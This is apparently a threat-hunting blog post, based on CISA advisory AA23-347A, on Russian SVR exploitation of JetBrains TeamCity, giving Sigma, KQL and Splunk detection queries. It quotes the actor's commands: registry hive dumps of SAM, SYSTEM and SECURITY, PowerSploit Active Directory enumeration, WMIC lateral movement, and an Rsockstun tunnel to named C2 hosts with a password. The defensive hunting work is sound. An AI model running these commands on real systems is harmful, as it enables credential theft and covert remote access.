Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally

Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally

Behavior Patterns

SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations
…In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023–42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to- detect command and control (C2) infrastructure.

The playbook is written based on the CISA Alert Code AA23–347A and contains corresponding Sigma Rules for threat hunting. It contains additionally a threat hunting Sigma Rule opportunity for living off the land and exploitation commands exploiting active directory and one for the EDRSandblast detection, that the SVR is also using in some cases.

Host Reconnaissance

whoami

Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033]:

whoami /priv
whoami /all
whoami /groups
whoami /domain

Privilege information listing via whoami

Sigma-Rules/Privilege information listing via whoami.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

Splunk:

index=* source=”WinEventLog:*” AND ((Image=”*whoami.exe’”) AND (CommandLine=”*priv*” OR CommandLine=”*Priv*”))

Whoami.exe Russian SVR JetBrains

Sigma-Rules/Whoami.exe Russian SVR JetBrains.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where ((FolderPath endswith @’\whoami.exe’ or InitiatingProcessVersionInfoOriginalFileName =~ @’whoami.exe’ or ProcessVersionInfoOriginalFileName =~ @’whoami.exe’) and (ProcessCommandLine contains @’ /priv’ or ProcessCommandLine contains @’ /all’ or ProcessCommandLine contains @’ /groups’ or ProcessCommandLine contains @’ /domain’))

DC listing via nltest

nltest -dclist
nltest -dsgetd

Sigma-Rules/DC listing via nltest.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (FolderPath endswith @’nltest.exe’ and (ProcessCommandLine matches regex @’(?i).*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*’))

DLL execution via WMI

Sigma-Rules/DLL execution via WMI.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (FolderPath endswith @’WMIC.exe’ and (ProcessCommandLine contains @’call’ or ProcessCommandLine contains @’rundll32'))

Splunk:

index=* source=”WinEventLog:*” AND ((Image=”*WMIC.exe”) AND (CommandLine=”*call*” OR CommandLine=”*rundll32*”))

Process with connect and pass as args

Sigma-Rules/Process with connect and pass as args.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (ProcessCommandLine contains @’pass’ and ProcessCommandLine contains @’connect’)

Splunk:

index=* source=”WinEventLog:*” AND ((CommandLine=”*pass*”) AND (CommandLine=”*connect*”))

Service or Drive enumeration via powershell

Sigma-Rules/Service or Drive enumeration via powershell.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceEvents | where ActionType == “PowerShellCommand” | where (((AdditionalFields contains @’Get-WmiObject’ or InitiatingProcessCommandLine contains @’Get-WmiObject’) and (AdditionalFields contains @’-Class’ or InitiatingProcessCommandLine contains @’-Class’) and (AdditionalFields contains @’Win32_Service’ or InitiatingProcessCommandLine contains @’Win32_Service’)) or ((AdditionalFields contains @’Get-WindowsDriver’ or InitiatingProcessCommandLine contains @’Get-WindowsDriver’) and (AdditionalFields contains @’-Online’ or InitiatingProcessCommandLine contains @’-Online’) and (AdditionalFields contains @’-All’ or InitiatingProcessCommandLine contains @’-All’)))

Splunk:

index=* source=”WinEventLog:*” AND (((ScriptBlockText=”*Get-WmiObject*”) AND (ScriptBlockText=”*-Class*”) AND (ScriptBlockText=”*Win32_Service*”)) OR ((ScriptBlockText=”*Get-WindowsDriver*”) AND (ScriptBlockText=”*-Online*”) AND (ScriptBlockText=”*-All*”)))

DLL names used by SVR for GraphicalProton backdoor

GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator.  After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is used as a primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files — with both commands and results [T1564.001]. Directory name is re-randomized each time the GraphicalProton process is started.

Sigma-Rules/DLL names used by SVR for GraphicalProton backdoor.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceImageLoadEvents | where (FolderPath endswith @’AclNumsInvertHost.dll’ or FolderPath endswith @’ModeBitmapNumericAnimate.dll’ or FolderPath endswith @’UnregisterAncestorAppendAuto.dll’ or FolderPath endswith @’DeregisterSeekUsers.dll’ or FolderPath endswith @’ScrollbarHandleGet.dll’ or FolderPath endswith @’PerformanceCaptionApi.dll’ or FolderPath endswith @’WowIcmpRemoveReg.dll’ or FolderPath endswith @’BlendMonitorStringBuild.dll’ or FolderPath endswith @’HandleFrequencyAll.dll’ or FolderPath endswith @’HardSwapColor.dll’ or FolderPath endswith @’LengthInMemoryActivate.dll’ or FolderPath endswith @’ParametersNamesPopup.dll’ or FolderPath endswith @’ModeFolderSignMove.dll’ or FolderPath endswith @’ChildPaletteConnected.dll’ or FolderPath endswith @’AddressResourcesSpec.dll’)

Splunk:

index=* source=”WinEventLog:*” AND (ImageLoaded=”*AclNumsInvertHost.dll” OR ImageLoaded=”*ModeBitmapNumericAnimate.dll” OR ImageLoaded=”*UnregisterAncestorAppendAuto.dll” OR ImageLoaded=”*DeregisterSeekUsers.dll” OR ImageLoaded=”*ScrollbarHandleGet.dll” OR ImageLoaded=”*PerformanceCaptionApi.dll” OR ImageLoaded=”*WowIcmpRemoveReg.dll” OR ImageLoaded=”*BlendMonitorStringBuild.dll” OR ImageLoaded=”*HandleFrequencyAll.dll” OR ImageLoaded=”*HardSwapColor.dll” OR ImageLoaded=”*LengthInMemoryActivate.dll” OR ImageLoaded=”*ParametersNamesPopup.dll” OR ImageLoaded=”*ModeFolderSignMove.dll” OR ImageLoaded=”*ChildPaletteConnected.dll” OR ImageLoaded=”*AddressResourcesSpec.dll”)

Sensitive registry entries saved to file

In order to exfiltrate Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. it used “reg save” to save SYSTEM, SAM and SECURITY registry hives, and used powershell to stage .zip archives in the

C:\Windows\Temp\ directory:

reg save HKLM\SYSTEM “”C:\Windows\temp\1\sy.sa”” /y  
reg save HKLM\SAM “”C:\Windows\temp\1\sam.sa”” /y  
reg save HKLM\SECURITY “”C:\Windows\temp\1\se.sa”” /y  
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q

Sigma-Rules/Sensitive registry entries saved to file.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (FolderPath endswith @’reg.exe’ and ProcessCommandLine contains @’save’ and (ProcessCommandLine matches regex @’(?i).*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*’) and (ProcessCommandLine matches regex @’(?i).*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*’))

Compressing files from temp to temp

Sigma-Rules/Compressing files from temp to temp.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceEvents | where ActionType == “PowerShellCommand” | where ((AdditionalFields matches regex @’(?i).*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1–9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*’) or (InitiatingProcessCommandLine matches regex @’(?i).*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1–9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*’))

Scheduled tasks names used by SVR for Graphical backdoor

Sigma-Rules/Scheduled tasks names used by SVR for GraphicalProton backdoor command.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

Splunk:

index=* source=”WinEventLog:*” AND ((EventCode=”4698" OR EventCode=”4699" OR EventCode=”4702") AND (TaskName=”\\Microsoft\\Windows\\IISUpdateService” OR TaskName=”\\Microsoft\\Windows\\WindowsDefenderService” OR TaskName=”\\Microsoft\\Windows\\WindowsDefenderService2" OR TaskName=”\\Microsoft\\DefenderService” OR TaskName=”\\Microsoft\\Windows\\DefenderUPDService” OR TaskName=”\\Microsoft\\Windows\\WiMSDFS” OR TaskName=”\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck” OR TaskName=”\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting” OR TaskName=”\\Microsoft\\Windows\\Windows Defender\\Defender Update Service” OR TaskName=”\\WindowUpdate” OR TaskName=”\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting” OR TaskName=”\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck” OR TaskName=”\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask” OR TaskName=”\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart” OR TaskName=”\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck” OR TaskName=”\\Microsoft\\Windows\\ATPUpd” OR TaskName=”\\Microsoft\\Windows\\Windows Defender\\Service Update” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck” OR TaskName=”\\Defender” OR TaskName=”\\defender” OR TaskName=”\\Microsoft\\Windows\\IISUpdateService” OR TaskName=”\\Microsoft\\Windows\\WindowsDefenderService” OR TaskName=”\\Microsoft\\Windows\\WindowsDefenderService2" OR TaskName=”\\Microsoft\\DefenderService” OR TaskName=”\\Microsoft\\Windows\\DefenderUPDService” OR TaskName=”\\Microsoft\\Windows\\WiMSDFS” OR TaskName=”\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck” OR TaskName=”\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting” OR TaskName=”\\Microsoft\\Windows\\Windows Defender\\Defender Update Service” OR TaskName=”\\WindowUpdate” OR TaskName=”\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting” OR TaskName=”\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck” OR TaskName=”\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask” OR TaskName=”\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart” OR TaskName=”\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck” OR TaskName=”\\Microsoft\\Windows\\ATPUpd” OR TaskName=”\\Microsoft\\Windows\\Windows Defender\\Service Update” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck” OR TaskName=”\\Defender” OR TaskName=”\\defender”))

MDE KQL:

DeviceProcessEvents | where ((FolderPath endswith @’schtasks.exe’ and (ProcessCommandLine contains @’IISUpdateService’ or ProcessCommandLine contains @’WindowsDefenderService’ or ProcessCommandLine contains @’WindowsDefenderService2' or ProcessCommandLine contains @’DefenderService’ or ProcessCommandLine contains @’DefenderUPDService’ or ProcessCommandLine contains @’WiMSDFS’ or ProcessCommandLine contains @’StartupAppTaskCkeck’ or ProcessCommandLine contains @’SubmitReporting’ or ProcessCommandLine contains @’Defender Update Service’ or ProcessCommandLine contains @’WindowUpdate’ or ProcessCommandLine contains @’CheckReporting’ or ProcessCommandLine contains @’StartupAppTaskCheck’ or ProcessCommandLine contains @’SpeechModelInstallTask’ or ProcessCommandLine contains @’BfeOnServiceStart’ or ProcessCommandLine contains @’Data Integrity Update’ or ProcessCommandLine contains @’Scheduled AutoCheck’ or ProcessCommandLine contains @’ATPUpd’ or ProcessCommandLine contains @’Service Update’ or ProcessCommandLine contains @’Scheduled Check’ or ProcessCommandLine contains @’Scheduled AutoCheck’ or ProcessCommandLine contains @’Defender’ or ProcessCommandLine contains @’defender’)) or (FolderPath endswith @’schtasks.exe’ and ((ProcessCommandLine matches regex @’(?i).*Defender\sUpdate\sService.*’) or (ProcessCommandLine matches regex @’(?i).*Data\sIntegrity\sUpdate.*’) or (ProcessCommandLine matches regex @’(?i).*Scheduled\sAutoCheck.*’) or (ProcessCommandLine matches regex @’(?i).*Service\sUpdate.*’) or (ProcessCommandLine matches regex @’(?i).*Scheduled\sCheck.*’) or (ProcessCommandLine matches regex @’(?i).*Scheduled\sAutoCheck.*’))))

Tactics Used to Avoid Detection

To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001]. This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and protecting running processes and protecting them from infection. The actors then inject code into AV/EDR processes for a small subset of victims [T1068].

Sigma-Rules/EDRSandblast Malicious Driver Detection.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceFileEvents | where (InitiatingProcessFolderPath endswith @’WNBIOS.sys’ or InitiatingProcessFolderPath endswith @’ntkrnlmp.pdb’ or InitiatingProcessFolderPath endswith @’GDRV.sys’ or InitiatingProcessFolderPath endswith @’RTCore64.sys’ or InitiatingProcessFolderPath endswith @’DBUtil_2_3.sys’)

Splunk:

index=* source=”WinEventLog:*” AND (Image=”*WNBIOS.sys” OR Image=”*ntkrnlmp.pdb” OR Image=”*GDRV.sys” OR Image=”*RTCore64.sys” OR Image=”*DBUtil_2_3.sys”)

Further Recon Hunting and Redteaming opportunities

After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
Get-NetComputer  
Get-NetGroup  
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount”  
Get-NetDiDomain  
Get-AdUser  
Get-DomainUser -UserName  
Get-NetUser -PreauthNotRequire  
Get-NetComputer | select samaccountname  
Get-NetUser -SPN | select serviceprincipalname

Living Off The Land and Exploitation Active Directory

Commands like above are used by threat actors when they try to get further information about the Active Directory to move laterally. Further commands could be found here LOLAD.

The LOLAD and Exploitation project provides a comprehensive collection of Active Directory techniques, commands, and functions that can be used natively to support offensive security operations and Red Team exercises. These techniques leverage AD’s built-in tools to conduct reconnaissance, privilege escalation, and lateral movement, among other tactics. Understanding these methods helps defenders strengthen AD configurations and improve monitoring capabilities.

I’ve written for all commands a Sigma Rule for threat hunting.

Sigma-Rules/Living Off The Land and Exploitation Active Directory.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules

MDE KQL:

DeviceProcessEvents | where (((FolderPath endswith @’\powershell.exe’ or FolderPath endswith @’\pwsh.exe’ or FolderPath endswith @’\powershell_ise.exe’) or ProcessVersionInfoOriginalFileName in~ (@’PowerShell.EXE’, @’pwsh.dll’)) and (ProcessCommandLine contains @’Get-AD ‘ or ProcessCommandLine contains @’Get-GPO’ or ProcessCommandLine contains @’Search-ADAccount’ or ProcessCommandLine contains @’Get-NetGroup’ or ProcessCommandLine contains @’Get-NetDomain’ or ProcessCommandLine contains @’Get-NetDomainTrust’ or ProcessCommandLine contains @’Get-LocalGroupMember’ or ProcessCommandLine contains @’Get-NetUser’ or ProcessCommandLine contains @’Get-DomainPolicy’ or ProcessCommandLine contains @’Get-NetSession’ or ProcessCommandLine contains @’Get-DnsServer’ or ProcessCommandLine contains @’Get-ADReplicationSubnet’ or ProcessCommandLine contains @’Get-EventLog’ or ProcessCommandLine contains @’Clear-EventLog’ or ProcessCommandLine contains @’Backup-GPO’))

Splunk:

index=* source=”WinEventLog:Microsoft-Windows-Sysmon/Operational” AND (((NewProcessName=”*\\powershell.exe” OR NewProcessName=”*\\pwsh.exe” OR NewProcessName=”*\\powershell_ise.exe”) OR (OriginalFileName=”PowerShell.EXE” OR OriginalFileName=”pwsh.dll”)) AND (CommandLine=”*Get-AD *” OR CommandLine=”*Get-GPO*” OR CommandLine=”*Search-ADAccount*” OR CommandLine=”*Get-NetGroup*” OR CommandLine=”*Get-NetDomain*” OR CommandLine=”*Get-NetDomainTrust*” OR CommandLine=”*Get-LocalGroupMember*” OR CommandLine=”*Get-NetUser*” OR CommandLine=”*Get-DomainPolicy*” OR CommandLine=”*Get-NetSession*” OR CommandLine=”*Get-DnsServer*” OR CommandLine=”*Get-ADReplicationSubnet*” OR CommandLine=”*Get-EventLog*” OR CommandLine=”*Clear-EventLog*” OR CommandLine=”*Backup-GPO*”))

Tunneling into Compromised Environments

In selected environments the SVR used an additional tool named, “rr.exe” — a modified open source reverse socks tunneler named Rsockstun — to establish a tunnel to the C2 infrastructure [T1572]. The authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”: 
 65.20.97[.]203:443  
Poetpages[.]com:8443 
The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk: 
wmic process call create “C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554–0sddsf2@34232fsl45t31” 
Lateral Movement The SVR used WMIC to facilitate lateral movement [T1047],[T1210]. 
wmic /node:”””” /user:””” /password:”””” process call create “”rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost”” 
The SVR also modified DisableRestrictedAdmin key to enable remote connections [T1210]. It modified Registry using the following reg command: 
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d “0” /f

Latest Recommendation October 2024

<a href="https://medium.com/media/21bcbcc7c830773c45b608bc0ffa7817/href">https://medium.com/media/21bcbcc7c830773c45b608bc0ffa7817/href</a>Russian Intelligence wikipedia

Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally was originally published in Detect FYI on Medium, where people are continuing the conversation by highlighting and responding to this story.

Introduction to Malware Binary Triage (IMBT) Course

Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.

Article Link: Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally | by SIMKRA | Jan, 2025 | Detect FYI